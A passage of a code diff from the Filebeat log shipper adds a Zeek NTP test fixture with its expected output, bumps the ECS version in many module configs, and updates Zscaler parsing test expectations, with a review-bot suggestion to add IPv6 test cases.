+{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
+{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
new file mode 100644
index 00000000000..940f548b1b7
--- /dev/null
+++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
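Review bot: The fixture `ntp-json.log` holds a single IPv4 client/server exchange (`mode` 3 and `mode` 4 on the same `uid`), so the pipeline's `network.type: ipv6` branch is never exercised. Its behaviour on a record that lacks one of the timestamp fields is also untested. Adding one line with IPv6 `id.orig_h`/`id.resp_h` values from a documentation range and one line with `ref_time` omitted would pin both paths in `ntp-json.log-expected.json`.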
@@ -0,0 +1,126 @@ +[ + { + "@timestamp": "2020-10-08T00:29:07.977Z", + "destination.address": "208.79.89.249", + "destination.as.number": 25795, + "destination.as.organization.name": "ARP NETWORKS, INC.", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "208.79.89.249", + "destination.port": 123, + "event.category": [ + "network" + ], + "event.dataset": "zeek.ntp", + "event.kind": "event", + "event.module": "zeek", + "event.original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", + "event.type": [ + "connection", + "protocol", + "info" + ], + "fileset.name": "ntp", + "input.type": "log", + "log.offset": 0, + "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "network.protocol": "ntp", + "network.transport": "udp", + "network.type": "ipv4", + "related.ip": [ + "130.118.205.62", + "208.79.89.249" + ], + "service.type": "zeek", + "source.address": "130.118.205.62", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 37.751, + "source.geo.location.lon": -97.822, + "source.ip": "130.118.205.62", + "source.port": 38461, + "tags": [ + "zeek.ntp" + ], + "zeek.ntp.mode": 3, + "zeek.ntp.num_exts": 0, + "zeek.ntp.org_time": "1970-01-01T00:00:00.000Z", + "zeek.ntp.poll": 1.0, + "zeek.ntp.precision": 1.0, + "zeek.ntp.rec_time": "1970-01-01T00:00:00.000Z", + "zeek.ntp.ref_id": "\\x00\\x00\\x00\\x00", + "zeek.ntp.ref_time": 
"1970-01-01T00:00:00.000Z", + "zeek.ntp.root_delay": 0.0, + "zeek.ntp.root_disp": 0.0, + "zeek.ntp.stratum": 0, + "zeek.ntp.version": 4, + "zeek.ntp.xmt_time": "2020-10-08T00:29:07.215Z", + "zeek.session_id": "CqlPpF1AQVLMPgGiL5" + }, + { + "@timestamp": "2020-10-08T00:29:08.081Z", + "destination.address": "208.79.89.249", + "destination.as.number": 25795, + "destination.as.organization.name": "ARP NETWORKS, INC.", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "208.79.89.249", + "destination.port": 123, + "event.category": [ + "network" + ], + "event.dataset": "zeek.ntp", + "event.kind": "event", + "event.module": "zeek", + "event.original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", + "event.type": [ + "connection", + "protocol", + "info" + ], + "fileset.name": "ntp", + "input.type": "log", + "log.offset": 335, + "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "network.protocol": "ntp", + "network.transport": "udp", + "network.type": "ipv4", + "related.ip": [ + "130.118.205.62", + "208.79.89.249" + ], + "service.type": "zeek", + "source.address": "130.118.205.62", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 37.751, + "source.geo.location.lon": -97.822, + "source.ip": "130.118.205.62", + "source.port": 38461, + "tags": 
[ + "zeek.ntp" + ], + "zeek.ntp.mode": 4, + "zeek.ntp.num_exts": 0, + "zeek.ntp.org_time": "2020-10-08T00:29:07.215Z", + "zeek.ntp.poll": 8.0, + "zeek.ntp.precision": 5.960464477539063e-08, + "zeek.ntp.rec_time": "2020-10-08T00:29:07.964Z", + "zeek.ntp.ref_id": "127.67.113.92", + "zeek.ntp.ref_time": "2020-10-08T00:24:15.942Z", + "zeek.ntp.root_delay": 0.00921630859375, + "zeek.ntp.root_disp": 0.0212249755859375, + "zeek.ntp.stratum": 2, + "zeek.ntp.version": 4, + "zeek.ntp.xmt_time": "2020-10-08T00:29:07.964Z", + "zeek.session_id": "CqlPpF1AQVLMPgGiL5" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml index d929f70633f..d4b5bfd6e6a 100644 --- a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml +++ b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml @@ -64,4 +64,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/pe/config/pe.yml b/x-pack/filebeat/module/zeek/pe/config/pe.yml index 34b81b46117..1bb4e1ad2ec 100644 --- a/x-pack/filebeat/module/zeek/pe/config/pe.yml +++ b/x-pack/filebeat/module/zeek/pe/config/pe.yml @@ -33,4 +33,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/radius/config/radius.yml b/x-pack/filebeat/module/zeek/radius/config/radius.yml index 0779807c8fe..64498bc76e2 100644 --- a/x-pack/filebeat/module/zeek/radius/config/radius.yml +++ b/x-pack/filebeat/module/zeek/radius/config/radius.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml index f29a099da6b..ebc98d1709e 100644 --- a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml +++ b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml 
@@ -88,4 +88,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml index 0f974ac07d7..33d4ffd4b90 100644 --- a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml +++ b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/signature/config/signature.yml b/x-pack/filebeat/module/zeek/signature/config/signature.yml index e6bef4d1a9d..a5a0015f310 100644 --- a/x-pack/filebeat/module/zeek/signature/config/signature.yml +++ b/x-pack/filebeat/module/zeek/signature/config/signature.yml @@ -47,4 +47,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/sip/config/sip.yml b/x-pack/filebeat/module/zeek/sip/config/sip.yml index 3530b53ce8b..6f726c62949 100644 --- a/x-pack/filebeat/module/zeek/sip/config/sip.yml +++ b/x-pack/filebeat/module/zeek/sip/config/sip.yml @@ -95,4 +95,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml index 7b0ba2dd6dc..97936f70544 100644 --- a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml +++ b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml @@ -101,4 +101,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml index aa530a6f0de..1490649b7cd 100644 --- a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml +++ b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml 
@@ -61,4 +61,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml index 414432e30a6..065b62277ff 100644 --- a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml +++ b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml index cf31baf7d0c..bb512551389 100644 --- a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml +++ b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml index b508ee874df..1a4e4582263 100644 --- a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml +++ b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml @@ -69,4 +69,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/socks/config/socks.yml b/x-pack/filebeat/module/zeek/socks/config/socks.yml index cc486a60c40..4affcb5a09c 100644 --- a/x-pack/filebeat/module/zeek/socks/config/socks.yml +++ b/x-pack/filebeat/module/zeek/socks/config/socks.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml index 14e673c3e04..e171128c335 100644 --- a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml +++ b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml @@ -76,4 +76,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml index cf3281a5d76..a2f80412b68 100644 --- a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml +++ b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml @@ -94,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/stats/config/stats.yml b/x-pack/filebeat/module/zeek/stats/config/stats.yml index a8fcb0ce6b9..099027b910c 100644 --- a/x-pack/filebeat/module/zeek/stats/config/stats.yml +++ b/x-pack/filebeat/module/zeek/stats/config/stats.yml @@ -97,4 +97,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml index 167e7ea9569..44b6c7062c0 100644 --- a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml +++ b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml index 35671bd15a4..229594da472 100644 --- a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml +++ b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml @@ -45,4 +45,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml index 8bf2bd3ed48..82886945a08 100644 --- a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml +++ b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/zeek/weird/config/weird.yml b/x-pack/filebeat/module/zeek/weird/config/weird.yml index 317001ec2e4..289e74d52da 100644 --- a/x-pack/filebeat/module/zeek/weird/config/weird.yml +++ b/x-pack/filebeat/module/zeek/weird/config/weird.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/x509/config/x509.yml b/x-pack/filebeat/module/zeek/x509/config/x509.yml index 0f9b418e4fa..971c058c911 100644 --- a/x-pack/filebeat/module/zeek/x509/config/x509.yml +++ b/x-pack/filebeat/module/zeek/x509/config/x509.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml index 34f0d4a6a54..cde58f81b50 100644 --- a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml +++ b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zscaler/zia/config/input.yml b/x-pack/filebeat/module/zscaler/zia/config/input.yml index cf61c0a28f7..8e5928799a3 100644 --- a/x-pack/filebeat/module/zscaler/zia/config/input.yml +++ b/x-pack/filebeat/module/zscaler/zia/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json b/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json index f741ff36d9a..920448da59f 100644 --- a/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json +++ b/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json 
@@ -26,8 +26,8 @@ "rci737.www5.example" ], "related.ip": [ - "10.176.10.114", - "10.206.191.17" + "10.206.191.17", + "10.176.10.114" ], "related.user": [ "sumdo" @@ -41,8 +41,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ntium", "rsa.misc.action": [ - "Blocked", - "pisciv" + "pisciv", + "Blocked" ], "rsa.misc.category": "umq", "rsa.misc.filter": "oremi", @@ -68,6 +68,7 @@ "url.original": "https://api.example.com/ivelitse/ritin.htm?utl=vol#amremap", "user.name": "sumdo", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -100,8 +101,8 @@ "eosquir5191.www.example" ], "related.ip": [ - "10.26.46.95", - "10.173.22.152" + "10.173.22.152", + "10.26.46.95" ], "related.user": [ "eataevi" @@ -115,8 +116,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "luptat", "rsa.misc.action": [ - "Allowed", - "tur" + "tur", + "Allowed" ], "rsa.misc.category": "eius", "rsa.misc.filter": "ameaqu", @@ -142,6 +143,7 @@ "url.original": "https://internal.example.net/isiutal/moenimi.jpg?gnaali=enatus#mquia", "user.name": "eataevi", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -176,8 +178,8 @@ "orsitame3262.domain" ], "related.ip": [ - "10.204.86.149", - "10.254.146.57" + "10.254.146.57", + "10.204.86.149" ], "related.user": [ "tenima" 
@@ -191,8 +193,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uptassi", "rsa.misc.action": [ - "Blocked", - "giatq" + "giatq", + "Blocked" ], "rsa.misc.category": "llu", "rsa.misc.filter": "tconsec", @@ -218,6 +220,7 @@ "url.original": "https://example.com/taspe/mvolu.gif?atcup=snos#iquaUte", "user.name": "tenima", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -267,8 +270,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ima", "rsa.misc.action": [ - "Allowed", - "llam" + "llam", + "Allowed" ], "rsa.misc.category": "aboris", "rsa.misc.filter": "atatnonp", @@ -294,6 +297,7 @@ "url.original": "https://api.example.org/doloreeu/pori.jpg?itati=mfu#uid", "user.name": "equun", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -328,8 +332,8 @@ "ore2933.www.test" ], "related.ip": [ - "10.136.153.149", - "10.61.78.108" + "10.61.78.108", + "10.136.153.149" ], "related.user": [ "ercit" @@ -343,8 +347,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "inim", "rsa.misc.action": [ - "Blocked", - "reetdolo" + "reetdolo", + "Blocked" ], "rsa.misc.category": "osquir", "rsa.misc.filter": "ipit", 
@@ -370,6 +374,7 @@ "url.original": "https://api.example.com/ele/tenbyCic.gif?porainc=amquisno#iinea", "user.name": "ercit", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -446,6 +451,7 @@ "url.original": "https://mail.example.org/sitas/ehenderi.jpg?atquovo=iumto#aboreetd", "user.name": "tessec", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -522,6 +528,7 @@ "url.original": "https://mail.example.net/aborumSe/luptat.txt?antiumto=strude#ctetura", "user.name": "xercitat", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -598,6 +605,7 @@ "url.original": "https://www5.example.net/ntutla/equa.jpg?civeli=errorsi#des", "user.name": "erc", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", 
@@ -647,8 +655,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "atquovo", "rsa.misc.action": [ - "Allowed", - "amvolup" + "amvolup", + "Allowed" ], "rsa.misc.category": "hil", "rsa.misc.filter": "deFinibu", @@ -674,6 +682,7 @@ "url.original": "https://api.example.net/atvol/umiur.txt?tati=utaliqu#oriosamn", "user.name": "quip", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -708,8 +717,8 @@ "sitvolup368.internal.host" ], "related.ip": [ - "10.135.225.244", - "10.71.170.37" + "10.71.170.37", + "10.135.225.244" ], "related.user": [ "atu" @@ -723,8 +732,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ihilm", "rsa.misc.action": [ - "psaquae", - "Allowed" + "Allowed", + "psaquae" ], "rsa.misc.category": "eFinib", "rsa.misc.filter": "inesci", @@ -750,6 +759,7 @@ "url.original": "https://mail.example.net/equep/iavolu.gif?aqu=rpo#uipe", "user.name": "atu", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -784,8 +794,8 @@ "ite2026.www.invalid" ], "related.ip": [ - "10.19.145.131", - "10.223.247.86" + "10.223.247.86", + "10.19.145.131" ], "related.user": [ "tNequepo" @@ -799,8 +809,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "sci", "rsa.misc.action": [ - "emseq", - "Allowed" + "Allowed", + "emseq" ], "rsa.misc.category": "exercit", "rsa.misc.filter": "taevit", 
@@ -826,6 +836,7 @@ "url.original": "https://example.org/bor/occa.htm?dol=leumiu#namali", "user.name": "tNequepo", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -860,8 +871,8 @@ "radipisc7020.home" ], "related.ip": [ - "10.181.80.139", - "10.2.53.125" + "10.2.53.125", + "10.181.80.139" ], "related.user": [ "ihilmo" @@ -902,6 +913,7 @@ "url.original": "https://internal.example.net/oru/temqu.htm?etMalor=ipi#reseos", "user.name": "ihilmo", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -978,6 +990,7 @@ "url.original": "https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn", "user.name": "ratvolu", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1012,8 +1025,8 @@ "piscin6866.internal.host" ], "related.ip": [ - "10.135.160.125", - "10.0.55.9" + "10.0.55.9", + "10.135.160.125" ], "related.user": [ "volupta" @@ -1027,8 +1040,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "iurer", "rsa.misc.action": [ - "Allowed", - "ionevo" + "ionevo", + "Allowed" ], "rsa.misc.category": "tinvolu", "rsa.misc.filter": "idex", 
@@ -1054,6 +1067,7 @@ "url.original": "https://www.example.org/eporr/xeacomm.html?aturQui=utlabor#rau", "user.name": "volupta", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1088,8 +1102,8 @@ "spi3544.www.host" ], "related.ip": [ - "10.111.187.12", - "10.63.250.128" + "10.63.250.128", + "10.111.187.12" ], "related.user": [ "saute" @@ -1130,6 +1144,7 @@ "url.original": "https://internal.example.net/ptatemq/luptatev.html?Nequepo=ipsumd#ntocc", "user.name": "saute", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1164,8 +1179,8 @@ "tlab5981.www.host" ], "related.ip": [ - "10.252.124.150", - "10.5.126.127" + "10.5.126.127", + "10.252.124.150" ], "related.user": [ "inibusB" @@ -1206,6 +1221,7 @@ "url.original": "https://www5.example.com/tateve/itinvol.txt?tenatus=cipitlab#ipsumd", "user.name": "inibusB", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1240,8 +1256,8 @@ "upida508.example" ], "related.ip": [ - "10.201.171.120", - "10.91.126.231" + "10.91.126.231", + "10.201.171.120" ], "related.user": [ "exercita" 
@@ -1255,8 +1271,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "umdo", "rsa.misc.action": [ - "orumSe", - "Blocked" + "Blocked", + "orumSe" ], "rsa.misc.category": "tanimid", "rsa.misc.filter": "itam", @@ -1282,6 +1298,7 @@ "url.original": "https://api.example.net/tquiin/tse.jpg?ovol=ptasn#taedicta", "user.name": "exercita", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -1331,8 +1348,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "quid", "rsa.misc.action": [ - "itecto", - "Allowed" + "Allowed", + "itecto" ], "rsa.misc.category": "quam", "rsa.misc.filter": "adeser", @@ -1358,6 +1375,7 @@ "url.original": "https://mail.example.org/olor/ineavo.gif?mquelau=iadolor#amcol", "user.name": "str", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -1434,6 +1452,7 @@ "url.original": "https://www.example.com/its/ender.gif?oles=edic#seq", "user.name": "aturve", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile 